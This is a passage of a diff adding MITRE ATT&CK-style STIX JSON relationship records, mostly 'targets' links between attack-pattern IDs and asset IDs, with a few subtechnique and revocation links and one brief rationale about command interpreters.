"x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--13539e13-34be-4780-ae31-d2ae5e17d9f4", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--861b8fd2-57f3-4ee1-ab5d-c19c3b8c7a4a", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--13615f92-009c-4ac4-9598-bfeab98593f8", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cbb66055-0325-4111-aca0-40547b6ad5b0", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--13c8277d-a588-4977-be28-45d9aa0b298a", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8cdeb020-e31e-4f88-a582-f53dcfbda819", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--13d8b191-febb-420b-8b1e-24df13b0108f", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--13db8f74-5a82-4e9f-a887-6d3bb12d2815", + "created": "2024-06-26T15:38:24.325Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:38:24.325Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e49920b0-6c54-40c1-9571-73723653205f", + "target_ref": "x-mitre-asset--8a455821-6e6e-49b0-9b6d-ac01011263c1", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--13eef5a5-c094-4a59-97e4-8cc7e8719e3b", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3975dbb5-0e1e-4f5b-bae1-cf2ab84b46dc", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--13fade18-6f60-40c6-bf34-0ef97424a4ce", + "created": "2024-05-20T17:52:00.696Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-22T15:21:45.850Z", + "description": "Asset Mapping Rationale: Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface", + "relationship_type": "targets", + "source_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--14001dd1-18fe-4146-bd2d-eae7f0c163f7", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--38eb0c22-6caf-46ce-8869-5964bd735858", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1412d228-6637-43c9-92ee-a891ceb1b18e", + "created": "2024-06-21T14:12:20.272Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.272Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7f0ca133-88c4-40c6-a62f-b3083a7fbc2e", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--14187cd0-37e6-400c-97b5-5088118d70d6", + "created": "2024-06-21T14:12:20.260Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.260Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--866d0d6d-02c6-42bd-aa2f-02907fdc0969", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--141d83ab-1e07-4897-91d7-b1c1793131a1", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1429cd78-4e2a-4898-a7d8-d01a0c465bd6", + "created": "2023-10-02T20:24:12.666Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-10-02T20:24:12.666Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0fe075d5-beac-4d02-b93e-0f874997db72", + "target_ref": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--142c49ec-e3d3-4a4d-a6c2-966a7f802ba5", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--144f6ce7-d2b2-4a76-85d2-251191a0d2cc", + "created": "2023-09-29T16:32:33.078Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:32:33.078Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3b6b9246-43f8-4c69-ad7a-2b11cfe0a0d9", + "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1452b800-9f27-4a56-8284-c329113199e7", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--149f23d1-640f-41e0-aec7-865c619a6c9c", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--14a0804b-1b76-43e1-8fe5-96962b1da942", + "created": "2020-01-15T16:25:22.518Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--dca670cf-eeec-438f-8185-fd959d9ef211", + "target_ref": "attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--14c5b60a-4b09-442a-bfd2-2e476de2a57d", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ff73aa03-0090-4464-83ac-f89e233c02bc", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--14c73603-a6d2-4a8d-9904-0f8249aaa495", + "created": "2023-09-29T16:40:06.079Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:40:06.079Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", + "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--14e0161e-4c1c-4474-8385-2dcb1d3bb15f", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5e4a2073-9643-44cb-a0b5-e7f4048446c7", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--14e44799-44a9-44a1-aa4a-9ee2db2ef220", + "created": "2024-06-26T15:19:18.170Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:19:18.170Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65", + "target_ref": "x-mitre-asset--8a455821-6e6e-49b0-9b6d-ac01011263c1", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--14f4d177-5e99-43b8-8197-6285193d2170", + "created": "2024-06-21T14:12:20.255Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.255Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--14f689b2-55eb-4952-b3b7-c39dd31ad647", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--6d4a7fb3-5a24-42be-ae61-6728a2b581f6", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--14fc11d8-7600-4c93-aa30-c0b194b54e88", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--09cd431f-eaf4-4d2a-acaf-2a7acfe7ed58", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--15377914-bf08-4c7e-ab00-1e272e2f3c1a", + "created": "2023-09-28T19:47:25.303Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:47:25.303Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--153bc588-948b-4156-8e98-621a1bdb044d", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--154ee37d-f3cc-4a71-94f9-8079d08f0c75", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f2857333-11d4-45bf-b064-2c28d8525be5", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1558a1d5-3c99-46c9-acb1-e933883151da", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--156089c7-f988-49b7-b111-f5cd0cc9d7c6", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--09b130a2-a77e-4af0-a361-f46f9aad1345", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--15665bbf-2c42-4232-a5c1-b01ffea13041", + "created": "2020-01-24T13:51:01.423Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--ce4b7013-640e-48a9-b501-d0025a95f4bf", + "target_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--158104b8-58f1-4f4a-909e-550da273b476", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ebb42bbe-62d7-47d7-a55f-3b08b61d792d", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--159fb736-ba92-4564-aa6d-db6f64497763", + "created": "2023-09-28T20:25:59.717Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:25:59.717Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5a2610f6-9fff-41e1-bc27-575ca20383d4", + "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--15d1d250-4a11-4da8-bb3a-db0ebdaa599f", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--84e02621-8fdf-470f-bd58-993bb6a89d91", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--15dbdf71-7e5e-41c5-9f91-d9cf7c678fbb", + "created": "2024-06-26T14:37:17.598Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T14:37:17.598Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--635cbe30-392d-4e27-978e-66774357c762", + "target_ref": "x-mitre-asset--65c04f96-37e5-4358-ab16-087e240c1b6e", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--15dcda30-db9c-4ab5-8ff6-07daed684357", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4d2a5b3e-340d-4600-9123-309dd63c9bf8", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--15f62715-5433-48d2-836b-6dc828077a28", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b24e2a20-3b3d-4bf0-823b-1ed765398fb0", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--15fb0728-9973-4ce4-b0d9-2c177be952c7", + "created": "2020-02-21T21:00:49.032Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "target_ref": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--162772ee-960e-4b14-9c90-0d86ef3e5cf8", + "created": "2020-01-30T18:42:08.533Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--27960489-4e7f-461d-a62a-f5c0cb521e4a", + "target_ref": "attack-pattern--f005e783-57d4-4837-88ad-dbe7faee1c51", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": 